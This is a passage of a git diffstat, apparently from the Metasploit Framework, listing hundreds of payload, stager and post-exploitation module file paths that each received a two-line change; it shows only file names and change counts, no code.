modules/payloads/singles/cmd/unix/bind_perl.rb | 2 +- .../payloads/singles/cmd/unix/bind_perl_ipv6.rb | 2 +- modules/payloads/singles/cmd/unix/bind_ruby.rb | 2 +- .../payloads/singles/cmd/unix/bind_ruby_ipv6.rb | 2 +- modules/payloads/singles/cmd/unix/bind_zsh.rb | 2 +- modules/payloads/singles/cmd/unix/generic.rb | 2 +- modules/payloads/singles/cmd/unix/interact.rb | 2 +- modules/payloads/singles/cmd/unix/reverse.rb | 2 +- modules/payloads/singles/cmd/unix/reverse_awk.rb | 2 +- modules/payloads/singles/cmd/unix/reverse_bash.rb | 2 +- .../singles/cmd/unix/reverse_bash_telnet_ssl.rb | 2 +- modules/payloads/singles/cmd/unix/reverse_lua.rb | 2 +- .../payloads/singles/cmd/unix/reverse_netcat.rb | 2 +- .../singles/cmd/unix/reverse_netcat_gaping.rb | 2 +- .../payloads/singles/cmd/unix/reverse_nodejs.rb | 2 +- .../payloads/singles/cmd/unix/reverse_openssl.rb | 2 +- modules/payloads/singles/cmd/unix/reverse_perl.rb | 2 +- .../payloads/singles/cmd/unix/reverse_perl_ssl.rb | 2 +- .../payloads/singles/cmd/unix/reverse_php_ssl.rb | 2 +- .../payloads/singles/cmd/unix/reverse_python.rb | 2 +- .../singles/cmd/unix/reverse_python_ssl.rb | 2 +- modules/payloads/singles/cmd/unix/reverse_ruby.rb | 2 +- .../payloads/singles/cmd/unix/reverse_ruby_ssl.rb | 2 +- .../singles/cmd/unix/reverse_ssl_double_telnet.rb | 2 +- modules/payloads/singles/cmd/unix/reverse_zsh.rb | 2 +- modules/payloads/singles/cmd/windows/adduser.rb | 2 +- modules/payloads/singles/cmd/windows/bind_lua.rb | 2 +- modules/payloads/singles/cmd/windows/bind_perl.rb | 2 +- .../payloads/singles/cmd/windows/bind_perl_ipv6.rb | 2 +- modules/payloads/singles/cmd/windows/bind_ruby.rb | 2 +- .../singles/cmd/windows/download_eval_vbs.rb | 2 +- .../singles/cmd/windows/download_exec_vbs.rb | 2 +- modules/payloads/singles/cmd/windows/generic.rb | 2 +- .../singles/cmd/windows/powershell_bind_tcp.rb | 2 +- .../singles/cmd/windows/powershell_reverse_tcp.rb | 2 +- .../payloads/singles/cmd/windows/reverse_lua.rb | 2 +- .../payloads/singles/cmd/windows/reverse_perl.rb | 2 +- .../singles/cmd/windows/reverse_powershell.rb | 2 +- .../payloads/singles/cmd/windows/reverse_ruby.rb | 2 +- modules/payloads/singles/firefox/exec.rb | 2 +- modules/payloads/singles/firefox/shell_bind_tcp.rb | 2 +- .../payloads/singles/firefox/shell_reverse_tcp.rb | 2 +- modules/payloads/singles/generic/custom.rb | 2 +- modules/payloads/singles/generic/debug_trap.rb | 2 +- modules/payloads/singles/generic/shell_bind_tcp.rb | 2 +- .../payloads/singles/generic/shell_reverse_tcp.rb | 2 +- modules/payloads/singles/generic/tight_loop.rb | 2 +- .../payloads/singles/java/jsp_shell_bind_tcp.rb | 2 +- .../payloads/singles/java/jsp_shell_reverse_tcp.rb | 2 +- modules/payloads/singles/java/shell_reverse_tcp.rb | 2 +- modules/payloads/singles/linux/armle/adduser.rb | 2 +- modules/payloads/singles/linux/armle/exec.rb | 2 +- .../payloads/singles/linux/armle/shell_bind_tcp.rb | 2 +- .../singles/linux/armle/shell_reverse_tcp.rb | 2 +- modules/payloads/singles/linux/mipsbe/exec.rb | 2 +- modules/payloads/singles/linux/mipsbe/reboot.rb | 2 +- .../singles/linux/mipsbe/shell_bind_tcp.rb | 2 +- .../singles/linux/mipsbe/shell_reverse_tcp.rb | 2 +- modules/payloads/singles/linux/mipsle/exec.rb | 2 +- modules/payloads/singles/linux/mipsle/reboot.rb | 2 +- .../singles/linux/mipsle/shell_bind_tcp.rb | 2 +- .../singles/linux/mipsle/shell_reverse_tcp.rb | 2 +- .../payloads/singles/linux/ppc/shell_bind_tcp.rb | 2 +- .../payloads/singles/linux/ppc/shell_find_port.rb | 2 +- .../singles/linux/ppc/shell_reverse_tcp.rb | 2 +- .../payloads/singles/linux/ppc64/shell_bind_tcp.rb | 2 +- .../singles/linux/ppc64/shell_find_port.rb | 2 +- .../singles/linux/ppc64/shell_reverse_tcp.rb | 2 +- modules/payloads/singles/linux/x64/exec.rb | 2 +- .../payloads/singles/linux/x64/shell_bind_tcp.rb | 2 +- .../linux/x64/shell_bind_tcp_random_port.rb | 2 +- .../payloads/singles/linux/x64/shell_find_port.rb | 2 +- .../singles/linux/x64/shell_reverse_tcp.rb | 2 +- modules/payloads/singles/linux/x86/adduser.rb | 2 +- modules/payloads/singles/linux/x86/chmod.rb | 2 +- modules/payloads/singles/linux/x86/exec.rb | 2 +- .../payloads/singles/linux/x86/metsvc_bind_tcp.rb | 2 +- .../singles/linux/x86/metsvc_reverse_tcp.rb | 2 +- modules/payloads/singles/linux/x86/read_file.rb | 2 +- .../singles/linux/x86/shell_bind_ipv6_tcp.rb | 2 +- .../payloads/singles/linux/x86/shell_bind_tcp.rb | 2 +- .../linux/x86/shell_bind_tcp_random_port.rb | 2 +- .../payloads/singles/linux/x86/shell_find_port.rb | 2 +- .../payloads/singles/linux/x86/shell_find_tag.rb | 2 +- .../singles/linux/x86/shell_reverse_tcp.rb | 2 +- .../singles/mainframe/shell_reverse_tcp.rb | 2 +- modules/payloads/singles/nodejs/shell_bind_tcp.rb | 2 +- .../payloads/singles/nodejs/shell_reverse_tcp.rb | 2 +- .../singles/nodejs/shell_reverse_tcp_ssl.rb | 2 +- .../payloads/singles/osx/armle/shell_bind_tcp.rb | 2 +- .../singles/osx/armle/shell_reverse_tcp.rb | 2 +- modules/payloads/singles/osx/armle/vibrate.rb | 2 +- modules/payloads/singles/osx/ppc/shell_bind_tcp.rb | 2 +- .../payloads/singles/osx/ppc/shell_reverse_tcp.rb | 2 +- modules/payloads/singles/osx/x64/exec.rb | 2 +- modules/payloads/singles/osx/x64/say.rb | 2 +- modules/payloads/singles/osx/x64/shell_bind_tcp.rb | 2 +- modules/payloads/singles/osx/x64/shell_find_tag.rb | 2 +- .../payloads/singles/osx/x64/shell_reverse_tcp.rb | 2 +- modules/payloads/singles/osx/x86/exec.rb | 2 +- modules/payloads/singles/osx/x86/shell_bind_tcp.rb | 2 +- .../payloads/singles/osx/x86/shell_find_port.rb | 2 +- .../payloads/singles/osx/x86/shell_reverse_tcp.rb | 2 +- .../singles/osx/x86/vforkshell_bind_tcp.rb | 2 +- .../singles/osx/x86/vforkshell_reverse_tcp.rb | 2 +- modules/payloads/singles/php/bind_perl.rb | 2 +- modules/payloads/singles/php/bind_perl_ipv6.rb | 2 +- modules/payloads/singles/php/bind_php.rb | 2 +- modules/payloads/singles/php/bind_php_ipv6.rb | 2 +- modules/payloads/singles/php/download_exec.rb | 2 +- modules/payloads/singles/php/exec.rb | 2 +- .../singles/php/meterpreter_reverse_tcp.rb | 2 +- modules/payloads/singles/php/reverse_perl.rb | 2 +- modules/payloads/singles/php/reverse_php.rb | 2 +- modules/payloads/singles/php/shell_findsock.rb | 2 +- .../singles/python/meterpreter_bind_tcp.rb | 2 +- .../singles/python/meterpreter_reverse_http.rb | 2 +- .../singles/python/meterpreter_reverse_https.rb | 2 +- .../singles/python/meterpreter_reverse_tcp.rb | 2 +- .../payloads/singles/python/shell_reverse_tcp.rb | 2 +- .../singles/python/shell_reverse_tcp_ssl.rb | 2 +- modules/payloads/singles/ruby/shell_bind_tcp.rb | 2 +- .../payloads/singles/ruby/shell_bind_tcp_ipv6.rb | 2 +- modules/payloads/singles/ruby/shell_reverse_tcp.rb | 2 +- .../payloads/singles/ruby/shell_reverse_tcp_ssl.rb | 2 +- .../singles/solaris/sparc/shell_bind_tcp.rb | 2 +- .../singles/solaris/sparc/shell_find_port.rb | 2 +- .../singles/solaris/sparc/shell_reverse_tcp.rb | 2 +- .../payloads/singles/solaris/x86/shell_bind_tcp.rb | 2 +- .../singles/solaris/x86/shell_find_port.rb | 2 +- .../singles/solaris/x86/shell_reverse_tcp.rb | 2 +- modules/payloads/singles/tty/unix/interact.rb | 2 +- modules/payloads/singles/windows/adduser.rb | 2 +- .../payloads/singles/windows/dns_txt_query_exec.rb | 2 +- modules/payloads/singles/windows/download_exec.rb | 2 +- modules/payloads/singles/windows/exec.rb | 2 +- .../payloads/singles/windows/format_all_drives.rb | 2 +- modules/payloads/singles/windows/loadlibrary.rb | 2 +- modules/payloads/singles/windows/messagebox.rb | 2 +- .../singles/windows/meterpreter_bind_tcp.rb | 2 +- .../singles/windows/meterpreter_reverse_http.rb | 2 +- .../singles/windows/meterpreter_reverse_https.rb | 2 +- .../windows/meterpreter_reverse_ipv6_tcp.rb | 2 +- .../singles/windows/meterpreter_reverse_tcp.rb | 2 +- .../payloads/singles/windows/metsvc_bind_tcp.rb | 2 +- .../payloads/singles/windows/metsvc_reverse_tcp.rb | 2 +- .../singles/windows/powershell_bind_tcp.rb | 2 +- .../singles/windows/powershell_reverse_tcp.rb | 2 +- modules/payloads/singles/windows/shell_bind_tcp.rb | 2 +- .../singles/windows/shell_bind_tcp_xpfw.rb | 2 +- .../singles/windows/shell_hidden_bind_tcp.rb | 2 +- .../payloads/singles/windows/shell_reverse_tcp.rb | 2 +- modules/payloads/singles/windows/speak_pwned.rb | 2 +- modules/payloads/singles/windows/x64/exec.rb | 2 +- .../payloads/singles/windows/x64/loadlibrary.rb | 2 +- .../singles/windows/x64/meterpreter_bind_tcp.rb | 2 +- .../windows/x64/meterpreter_reverse_http.rb | 2 +- .../windows/x64/meterpreter_reverse_https.rb | 2 +- .../windows/x64/meterpreter_reverse_ipv6_tcp.rb | 2 +- .../singles/windows/x64/meterpreter_reverse_tcp.rb | 2 +- .../singles/windows/x64/powershell_bind_tcp.rb | 2 +- .../singles/windows/x64/powershell_reverse_tcp.rb | 2 +- .../payloads/singles/windows/x64/shell_bind_tcp.rb | 2 +- .../singles/windows/x64/shell_reverse_tcp.rb | 2 +- modules/payloads/stagers/android/reverse_http.rb | 2 +- modules/payloads/stagers/android/reverse_https.rb | 2 +- modules/payloads/stagers/android/reverse_tcp.rb | 2 +- modules/payloads/stagers/bsd/x86/bind_ipv6_tcp.rb | 2 +- modules/payloads/stagers/bsd/x86/bind_tcp.rb | 2 +- modules/payloads/stagers/bsd/x86/find_tag.rb | 2 +- .../payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb | 2 +- modules/payloads/stagers/bsd/x86/reverse_tcp.rb | 2 +- modules/payloads/stagers/bsdi/x86/bind_tcp.rb | 2 +- modules/payloads/stagers/bsdi/x86/reverse_tcp.rb | 2 +- modules/payloads/stagers/java/bind_tcp.rb | 2 +- modules/payloads/stagers/java/reverse_http.rb | 2 +- modules/payloads/stagers/java/reverse_https.rb | 2 +- modules/payloads/stagers/java/reverse_tcp.rb | 2 +- modules/payloads/stagers/linux/armle/bind_tcp.rb | 2 +- .../payloads/stagers/linux/armle/reverse_tcp.rb | 2 +- .../payloads/stagers/linux/mipsbe/reverse_tcp.rb | 2 +- .../payloads/stagers/linux/mipsle/reverse_tcp.rb | 2 +- modules/payloads/stagers/linux/x64/bind_tcp.rb | 2 +- modules/payloads/stagers/linux/x64/reverse_tcp.rb | 2 +- .../payloads/stagers/linux/x86/bind_ipv6_tcp.rb | 2 +- .../stagers/linux/x86/bind_ipv6_tcp_uuid.rb | 2 +- .../payloads/stagers/linux/x86/bind_nonx_tcp.rb | 2 +- modules/payloads/stagers/linux/x86/bind_tcp.rb | 2 +- .../payloads/stagers/linux/x86/bind_tcp_uuid.rb | 2 +- modules/payloads/stagers/linux/x86/find_tag.rb | 2 +- .../payloads/stagers/linux/x86/reverse_ipv6_tcp.rb | 2 +- .../payloads/stagers/linux/x86/reverse_nonx_tcp.rb | 2 +- modules/payloads/stagers/linux/x86/reverse_tcp.rb | 2 +- .../payloads/stagers/linux/x86/reverse_tcp_uuid.rb | 2 +- modules/payloads/stagers/netware/reverse_tcp.rb | 2 +- modules/payloads/stagers/osx/armle/bind_tcp.rb | 2 +- modules/payloads/stagers/osx/armle/reverse_tcp.rb | 2 +- modules/payloads/stagers/osx/ppc/bind_tcp.rb | 2 +- modules/payloads/stagers/osx/ppc/find_tag.rb | 2 +- modules/payloads/stagers/osx/ppc/reverse_tcp.rb | 2 +- modules/payloads/stagers/osx/x64/bind_tcp.rb | 2 +- modules/payloads/stagers/osx/x64/reverse_tcp.rb | 2 +- modules/payloads/stagers/osx/x86/bind_tcp.rb | 2 +- modules/payloads/stagers/osx/x86/reverse_tcp.rb | 2 +- modules/payloads/stagers/php/bind_tcp.rb | 2 +- modules/payloads/stagers/php/bind_tcp_ipv6.rb | 2 +- modules/payloads/stagers/php/bind_tcp_ipv6_uuid.rb | 2 +- modules/payloads/stagers/php/bind_tcp_uuid.rb | 2 +- modules/payloads/stagers/php/reverse_tcp.rb | 2 +- modules/payloads/stagers/php/reverse_tcp_uuid.rb | 2 +- modules/payloads/stagers/python/bind_tcp.rb | 2 +- modules/payloads/stagers/python/bind_tcp_uuid.rb | 2 +- modules/payloads/stagers/python/reverse_http.rb | 2 +- modules/payloads/stagers/python/reverse_https.rb | 2 +- modules/payloads/stagers/python/reverse_tcp.rb | 2 +- .../payloads/stagers/python/reverse_tcp_uuid.rb | 2 +- .../stagers/windows/bind_hidden_ipknock_tcp.rb | 2 +- .../payloads/stagers/windows/bind_hidden_tcp.rb | 2 +- modules/payloads/stagers/windows/bind_ipv6_tcp.rb | 2 +- .../payloads/stagers/windows/bind_ipv6_tcp_uuid.rb | 2 +- modules/payloads/stagers/windows/bind_nonx_tcp.rb | 2 +- modules/payloads/stagers/windows/bind_tcp.rb | 2 +- modules/payloads/stagers/windows/bind_tcp_rc4.rb | 2 +- modules/payloads/stagers/windows/bind_tcp_uuid.rb | 2 +- modules/payloads/stagers/windows/findtag_ord.rb | 2 +- .../payloads/stagers/windows/reverse_hop_http.rb | 2 +- modules/payloads/stagers/windows/reverse_http.rb | 2 +- .../stagers/windows/reverse_http_proxy_pstore.rb | 2 +- modules/payloads/stagers/windows/reverse_https.rb | 2 +- .../stagers/windows/reverse_https_proxy.rb | 2 +- .../payloads/stagers/windows/reverse_ipv6_tcp.rb | 2 +- .../payloads/stagers/windows/reverse_nonx_tcp.rb | 2 +- .../payloads/stagers/windows/reverse_ord_tcp.rb | 2 +- modules/payloads/stagers/windows/reverse_tcp.rb | 2 +- .../stagers/windows/reverse_tcp_allports.rb | 2 +- .../payloads/stagers/windows/reverse_tcp_dns.rb | 2 +- .../payloads/stagers/windows/reverse_tcp_rc4.rb | 2 +- .../stagers/windows/reverse_tcp_rc4_dns.rb | 2 +- .../payloads/stagers/windows/reverse_tcp_uuid.rb | 2 +- .../payloads/stagers/windows/reverse_winhttp.rb | 2 +- .../payloads/stagers/windows/reverse_winhttps.rb | 2 +- .../payloads/stagers/windows/x64/bind_ipv6_tcp.rb | 2 +- .../stagers/windows/x64/bind_ipv6_tcp_uuid.rb | 2 +- modules/payloads/stagers/windows/x64/bind_tcp.rb | 2 +- .../payloads/stagers/windows/x64/bind_tcp_uuid.rb | 2 +- .../payloads/stagers/windows/x64/reverse_http.rb | 2 +- .../payloads/stagers/windows/x64/reverse_https.rb | 2 +- .../payloads/stagers/windows/x64/reverse_tcp.rb | 2 +- .../stagers/windows/x64/reverse_tcp_uuid.rb | 2 +- .../stagers/windows/x64/reverse_winhttp.rb | 2 +- .../stagers/windows/x64/reverse_winhttps.rb | 2 +- modules/payloads/stages/android/meterpreter.rb | 2 +- modules/payloads/stages/android/shell.rb | 2 +- modules/payloads/stages/bsd/x86/shell.rb | 2 +- modules/payloads/stages/bsdi/x86/shell.rb | 2 +- modules/payloads/stages/java/meterpreter.rb | 2 +- modules/payloads/stages/java/shell.rb | 2 +- modules/payloads/stages/linux/armle/shell.rb | 2 +- modules/payloads/stages/linux/mipsbe/shell.rb | 2 +- modules/payloads/stages/linux/mipsle/shell.rb | 2 +- modules/payloads/stages/linux/x64/shell.rb | 2 +- modules/payloads/stages/linux/x86/meterpreter.rb | 2 +- modules/payloads/stages/linux/x86/shell.rb | 2 +- modules/payloads/stages/netware/shell.rb | 2 +- modules/payloads/stages/osx/armle/execute.rb | 2 +- modules/payloads/stages/osx/armle/shell.rb | 2 +- modules/payloads/stages/osx/ppc/shell.rb | 2 +- modules/payloads/stages/osx/x64/dupandexecve.rb | 2 +- modules/payloads/stages/osx/x86/bundleinject.rb | 2 +- modules/payloads/stages/osx/x86/isight.rb | 2 +- modules/payloads/stages/osx/x86/vforkshell.rb | 2 +- modules/payloads/stages/php/meterpreter.rb | 2 +- modules/payloads/stages/python/meterpreter.rb | 2 +- modules/payloads/stages/windows/dllinject.rb | 2 +- modules/payloads/stages/windows/meterpreter.rb | 2 +- .../payloads/stages/windows/patchupdllinject.rb | 2 +- .../payloads/stages/windows/patchupmeterpreter.rb | 2 +- modules/payloads/stages/windows/shell.rb | 2 +- modules/payloads/stages/windows/upexec.rb | 2 +- modules/payloads/stages/windows/vncinject.rb | 2 +- modules/payloads/stages/windows/x64/meterpreter.rb | 2 +- modules/payloads/stages/windows/x64/shell.rb | 2 +- modules/payloads/stages/windows/x64/vncinject.rb | 2 +- modules/post/aix/hashdump.rb | 2 +- modules/post/android/capture/screen.rb | 2 +- modules/post/android/manage/remove_lock.rb | 2 +- modules/post/android/manage/remove_lock_root.rb | 2 +- modules/post/cisco/gather/enum_cisco.rb | 2 +- modules/post/firefox/gather/cookies.rb | 2 +- modules/post/firefox/gather/history.rb | 2 +- modules/post/firefox/gather/passwords.rb | 2 +- modules/post/firefox/gather/xss.rb | 2 +- modules/post/firefox/manage/webcam_chat.rb | 2 +- modules/post/linux/busybox/enum_connections.rb | 2 +- modules/post/linux/busybox/enum_hosts.rb | 2 +- modules/post/linux/busybox/jailbreak.rb | 2 +- modules/post/linux/busybox/ping_net.rb | 2 +- modules/post/linux/busybox/set_dmz.rb | 2 +- modules/post/linux/busybox/set_dns.rb | 2 +- modules/post/linux/busybox/smb_share_root.rb | 2 +- modules/post/linux/busybox/wget_exec.rb | 2 +- modules/post/linux/gather/checkvm.rb | 2 +- modules/post/linux/gather/ecryptfs_creds.rb | 2 +- modules/post/linux/gather/enum_configs.rb | 2 +- modules/post/linux/gather/enum_network.rb | 2 +- modules/post/linux/gather/enum_protections.rb | 2 +- modules/post/linux/gather/enum_psk.rb | 2 +- modules/post/linux/gather/enum_system.rb | 2 +- modules/post/linux/gather/enum_users_history.rb | 2 +- modules/post/linux/gather/enum_xchat.rb | 2 +- modules/post/linux/gather/gnome_commander_creds.rb | 2 +- modules/post/linux/gather/hashdump.rb | 2 +- modules/post/linux/gather/mount_cifs_creds.rb | 2 +- modules/post/linux/gather/openvpn_credentials.rb | 2 +- modules/post/linux/gather/pptpd_chap_secrets.rb | 2 +- modules/post/linux/manage/download_exec.rb | 2 +- modules/post/multi/escalate/cups_root_file_read.rb | 2 +- modules/post/multi/escalate/metasploit_pcaplog.rb | 2 +- modules/post/multi/gather/apple_ios_backup.rb | 2 +- modules/post/multi/gather/check_malware.rb | 2 +- modules/post/multi/gather/dbvis_enum.rb | 2 +- modules/post/multi/gather/dns_bruteforce.rb | 2 +- modules/post/multi/gather/dns_reverse_lookup.rb | 2 +- modules/post/multi/gather/dns_srv_lookup.rb | 2 +- modules/post/multi/gather/enum_vbox.rb | 2 +- modules/post/multi/gather/env.rb | 2 +- modules/post/multi/gather/fetchmailrc_creds.rb | 2 +- modules/post/multi/gather/filezilla_client_cred.rb | 2 +- modules/post/multi/gather/find_vmx.rb | 2 +- modules/post/multi/gather/firefox_creds.rb | 2 +- modules/post/multi/gather/gpg_creds.rb | 2 +- modules/post/multi/gather/lastpass_creds.rb | 2 +- modules/post/multi/gather/multi_command.rb | 2 +- modules/post/multi/gather/netrc_creds.rb | 2 +- modules/post/multi/gather/pgpass_creds.rb | 2 +- modules/post/multi/gather/pidgin_cred.rb | 2 +- modules/post/multi/gather/ping_sweep.rb | 2 +- modules/post/multi/gather/remmina_creds.rb | 2 +- modules/post/multi/gather/resolve_hosts.rb | 2 +- modules/post/multi/gather/rsyncd_creds.rb | 2 +- modules/post/multi/gather/rubygems_api_key.rb | 2 +- modules/post/multi/gather/run_console_rc_file.rb | 2 +- modules/post/multi/gather/skype_enum.rb | 2 +- modules/post/multi/gather/ssh_creds.rb | 2 +- modules/post/multi/gather/thunderbird_creds.rb | 2 +- modules/post/multi/gather/wlan_geolocate.rb | 2 +- modules/post/multi/general/close.rb | 2 +- modules/post/multi/general/execute.rb | 2 +- modules/post/multi/general/wall.rb | 2 +- modules/post/multi/manage/dbvis_add_db_admin.rb | 2 +- modules/post/multi/manage/dbvis_query.rb | 2 +- modules/post/multi/manage/multi_post.rb | 2 +- modules/post/multi/manage/play_youtube.rb | 2 +- modules/post/multi/manage/record_mic.rb | 2 +- modules/post/multi/manage/set_wallpaper.rb | 2 +- modules/post/multi/manage/shell_to_meterpreter.rb | 2 +- modules/post/multi/manage/sudo.rb | 2 +- modules/post/multi/manage/system_session.rb | 2 +- .../post/multi/recon/local_exploit_suggester.rb | 2 +- modules/post/osx/admin/say.rb | 2 +- modules/post/osx/capture/keylog_recorder.rb | 2 +- modules/post/osx/capture/screen.rb | 2 +- modules/post/osx/gather/autologin_password.rb | 2 +- modules/post/osx/gather/enum_adium.rb | 2 +- modules/post/osx/gather/enum_airport.rb | 2 +- .../post/osx/gather/enum_chicken_vnc_profile.rb | 2 +- modules/post/osx/gather/enum_colloquy.rb | 2 +- modules/post/osx/gather/enum_keychain.rb | 2 +- modules/post/osx/gather/enum_osx.rb | 2 +- modules/post/osx/gather/hashdump.rb | 2 +- modules/post/osx/gather/password_prompt_spoof.rb | 2 +- modules/post/osx/gather/safari_lastsession.rb | 2 +- modules/post/osx/manage/mount_share.rb | 2 +- modules/post/osx/manage/record_mic.rb | 2 +- modules/post/osx/manage/vpn.rb | 2 +- modules/post/osx/manage/webcam.rb | 2 +- modules/post/solaris/gather/checkvm.rb | 2 +- modules/post/solaris/gather/enum_packages.rb | 2 +- modules/post/solaris/gather/enum_services.rb | 2 +- modules/post/solaris/gather/hashdump.rb | 2 +- modules/post/windows/capture/keylog_recorder.rb | 2 +- modules/post/windows/capture/lockout_keylogger.rb | 2 +- modules/post/windows/escalate/droplnk.rb | 2 +- modules/post/windows/escalate/getsystem.rb | 2 +- modules/post/windows/escalate/golden_ticket.rb | 2 +- .../post/windows/escalate/ms10_073_kbdlayout.rb | 2 +- modules/post/windows/escalate/screen_unlock.rb | 2 +- modules/post/windows/gather/arp_scanner.rb | 2 +- modules/post/windows/gather/bitcoin_jacker.rb | 2 +- modules/post/windows/gather/bitlocker_fvek.rb | 2 +- modules/post/windows/gather/cachedump.rb | 2 +- modules/post/windows/gather/checkvm.rb | 2 +- .../windows/gather/credentials/bulletproof_ftp.rb | 2 +- modules/post/windows/gather/credentials/coreftp.rb | 2 +- .../gather/credentials/credential_collector.rb | 2 +- .../windows/gather/credentials/domain_hashdump.rb | 2 +- modules/post/windows/gather/credentials/dyndns.rb | 2 +- .../windows/gather/credentials/enum_cred_store.rb | 2 +- .../post/windows/gather/credentials/enum_laps.rb | 2 +- .../windows/gather/credentials/enum_picasa_pwds.rb | 2 +- modules/post/windows/gather/credentials/epo_sql.rb | 2 +- .../windows/gather/credentials/filezilla_server.rb | 2 +- .../post/windows/gather/credentials/flashfxp.rb | 2 +- .../windows/gather/credentials/ftpnavigator.rb | 2 +- modules/post/windows/gather/credentials/ftpx.rb | 2 +- modules/post/windows/gather/credentials/gpp.rb | 2 +- modules/post/windows/gather/credentials/idm.rb | 2 +- modules/post/windows/gather/credentials/imail.rb | 2 +- modules/post/windows/gather/credentials/imvu.rb | 2 +- .../gather/credentials/mcafee_vse_hashdump.rb | 2 +- modules/post/windows/gather/credentials/meebo.rb | 2 +- modules/post/windows/gather/credentials/mremote.rb | 2 +- .../gather/credentials/mssql_local_hashdump.rb | 2 +- modules/post/windows/gather/credentials/nimbuzz.rb | 2 +- modules/post/windows/gather/credentials/outlook.rb | 2 +- .../windows/gather/credentials/razer_synapse.rb | 2 +- .../post/windows/gather/credentials/razorsql.rb | 2 +- .../gather/credentials/rdc_manager_creds.rb | 2 +- modules/post/windows/gather/credentials/skype.rb | 2 +- .../post/windows/gather/credentials/smartermail.rb | 2 +- .../post/windows/gather/credentials/smartftp.rb | 2 +- .../post/windows/gather/credentials/spark_im.rb | 2 +- modules/post/windows/gather/credentials/sso.rb | 2 +- modules/post/windows/gather/credentials/steam.rb | 2 +- .../post/windows/gather/credentials/tortoisesvn.rb | 2 +- .../windows/gather/credentials/total_commander.rb | 2 +- .../post/windows/gather/credentials/trillian.rb | 2 +- modules/post/windows/gather/credentials/vnc.rb | 2 +- .../gather/credentials/windows_autologin.rb | 2 +- modules/post/windows/gather/credentials/winscp.rb | 2 +- .../windows/gather/credentials/wsftp_client.rb | 2 +- modules/post/windows/gather/dnscache_dump.rb | 2 +- modules/post/windows/gather/dumplinks.rb | 2 +- modules/post/windows/gather/enum_ad_bitlocker.rb | 2 +- modules/post/windows/gather/enum_ad_computers.rb | 2 +- modules/post/windows/gather/enum_ad_groups.rb | 2 +- .../windows/gather/enum_ad_managedby_groups.rb | 2 +- .../gather/enum_ad_service_principal_names.rb | 2 +- modules/post/windows/gather/enum_ad_to_wordlist.rb | 2 +- .../post/windows/gather/enum_ad_user_comments.rb | 2 +- modules/post/windows/gather/enum_ad_users.rb | 2 +- modules/post/windows/gather/enum_applications.rb | 2 +- modules/post/windows/gather/enum_artifacts.rb | 2 +- modules/post/windows/gather/enum_av_excluded.rb | 2 +- modules/post/windows/gather/enum_chrome.rb | 2 +- modules/post/windows/gather/enum_computers.rb | 2 +- modules/post/windows/gather/enum_db.rb | 2 +- modules/post/windows/gather/enum_devices.rb | 2 +- modules/post/windows/gather/enum_dirperms.rb | 2 +- modules/post/windows/gather/enum_domain.rb | 2 +- .../post/windows/gather/enum_domain_group_users.rb | 2 +- modules/post/windows/gather/enum_domain_tokens.rb | 2 +- modules/post/windows/gather/enum_domain_users.rb | 2 +- modules/post/windows/gather/enum_domains.rb | 2 +- modules/post/windows/gather/enum_files.rb | 2 +- modules/post/windows/gather/enum_hostfile.rb | 2 +- modules/post/windows/gather/enum_ie.rb | 2 +- .../post/windows/gather/enum_logged_on_users.rb | 2 +- .../post/windows/gather/enum_ms_product_keys.rb | 2 +- modules/post/windows/gather/enum_muicache.rb | 2 +- modules/post/windows/gather/enum_patches.rb | 2 +- modules/post/windows/gather/enum_powershell_env.rb | 2 +- modules/post/windows/gather/enum_prefetch.rb | 2 +- modules/post/windows/gather/enum_proxy.rb | 2 +- .../windows/gather/enum_putty_saved_sessions.rb | 2 +- modules/post/windows/gather/enum_services.rb | 2 +- modules/post/windows/gather/enum_shares.rb | 2 +- modules/post/windows/gather/enum_snmp.rb | 2 +- modules/post/windows/gather/enum_termserv.rb | 2 +- modules/post/windows/gather/enum_tokens.rb | 2 +- modules/post/windows/gather/enum_tomcat.rb | 2 +- modules/post/windows/gather/enum_unattend.rb | 2 +- modules/post/windows/gather/file_from_raw_ntfs.rb | 2 +- .../windows/gather/forensics/browser_history.rb | 2 +- .../post/windows/gather/forensics/duqu_check.rb | 2 +- .../post/windows/gather/forensics/enum_drives.rb | 2 +- modules/post/windows/gather/forensics/imager.rb | 2 +- .../post/windows/gather/forensics/nbd_server.rb | 2 +- .../windows/gather/forensics/recovery_files.rb | 2 +- modules/post/windows/gather/hashdump.rb | 2 +- .../post/windows/gather/local_admin_search_enum.rb | 2 +- modules/post/windows/gather/lsa_secrets.rb | 2 +- modules/post/windows/gather/memory_grep.rb | 2 +- modules/post/windows/gather/netlm_downgrade.rb | 2 +- modules/post/windows/gather/ntds_location.rb | 2 +- modules/post/windows/gather/outlook.rb | 2 +- .../windows/gather/phish_windows_credentials.rb | 2 +- modules/post/windows/gather/resolve_sid.rb | 2 +- modules/post/windows/gather/reverse_lookup.rb | 2 +- modules/post/windows/gather/screen_spy.rb | 2 +- modules/post/windows/gather/smart_hashdump.rb | 2 +- modules/post/windows/gather/tcpnetstat.rb | 2 +- modules/post/windows/gather/usb_history.rb | 2 +- modules/post/windows/gather/win_privs.rb | 2 +- modules/post/windows/gather/wmic_command.rb | 2 +- modules/post/windows/gather/word_unc_injector.rb | 2 +- modules/post/windows/manage/add_user_domain.rb | 2 +- modules/post/windows/manage/autoroute.rb | 2 +- modules/post/windows/manage/change_password.rb | 2 +- .../post/windows/manage/clone_proxy_settings.rb | 2 +- modules/post/windows/manage/delete_user.rb | 2 +- modules/post/windows/manage/download_exec.rb | 2 +- modules/post/windows/manage/driver_loader.rb | 2 +- modules/post/windows/manage/enable_rdp.rb | 2 +- .../post/windows/manage/enable_support_account.rb | 2 +- modules/post/windows/manage/exec_powershell.rb | 2 +- modules/post/windows/manage/forward_pageant.rb | 2 +- modules/post/windows/manage/ie_proxypac.rb | 2 +- modules/post/windows/manage/inject_ca.rb | 2 +- modules/post/windows/manage/inject_host.rb | 2 +- modules/post/windows/manage/killav.rb | 2 +- modules/post/windows/manage/migrate.rb | 2 +- .../post/windows/manage/mssql_local_auth_bypass.rb | 2 +- .../windows/manage/multi_meterpreter_inject.rb | 2 +- modules/post/windows/manage/nbd_server.rb | 2 +- modules/post/windows/manage/payload_inject.rb | 2 +- modules/post/windows/manage/portproxy.rb | 2 +- .../windows/manage/powershell/exec_powershell.rb | 2 +- .../post/windows/manage/powershell/load_script.rb | 2 +- modules/post/windows/manage/pptp_tunnel.rb | 2 +- modules/post/windows/manage/priv_migrate.rb | 2 +- modules/post/windows/manage/pxeexploit.rb | 2 +- .../post/windows/manage/reflective_dll_inject.rb | 2 +- modules/post/windows/manage/remove_ca.rb | 2 +- 